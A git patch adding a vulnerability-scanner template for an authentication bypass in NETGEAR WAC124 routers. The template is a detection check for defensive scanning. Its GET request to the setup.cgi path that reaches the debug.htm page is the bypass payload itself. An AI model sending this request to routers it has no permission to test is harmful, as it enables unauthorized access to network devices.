From 04ec5b6b6d5f08d22350f03ffcceac045b2b1059 Mon Sep 17 00:00:00 2001
From: gy741 <gy741.kim@gmail.com>
Date: Mon, 28 Mar 2022 00:10:41 +0900
Subject: [PATCH] Create netgear-wac124-router-auth-bypass.yaml (#3986)

* Create netgear-wac124-router-auth-bypass.yaml

This vulnerability allows network-adjacent attackers to bypass authentication on affected of WAC124, AC2000 routers. Authentication is not required to exploit this vulnerability.

Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>

* misc update

Co-authored-by: sandeep <sandeep@projectdiscovery.io>
---
 .../netgear-wac124-router-auth-bypass.yaml    | 27 +++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml

diff --git a/vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml b/vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml
new file mode 100644
index 0000000000..4c8c191714
--- /dev/null
+++ b/vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml
@@ -0,0 +1,27 @@
+id: netgear-wac124-router-auth-bypass
+
+info:
+  name: NETGEAR WAC124 Router Authentication Bypass
+  author: gy741
+  severity: high
+  description: |
+    This vulnerability allows network-adjacent attackers to bypass authentication on affected of WAC124, AC2000 routers. Authentication is not required to exploit this vulnerability.
+  reference:
+    - https://flattsecurity.medium.com/finding-bugs-to-trigger-unauthenticated-command-injection-in-a-netgear-router-psv-2022-0044-2b394fb9edc
+    - https://kb.netgear.com/000064730/Security-Advisory-for-Multiple-Vulnerabilities-on-the-WAC124-PSV-2022-0044
+  tags: netgear,auth-bypass,router,iot
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/setup.cgi?next_file=debug.htm&x=currentsetting.htm"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "Enable Telnet"
\ No newline at end of file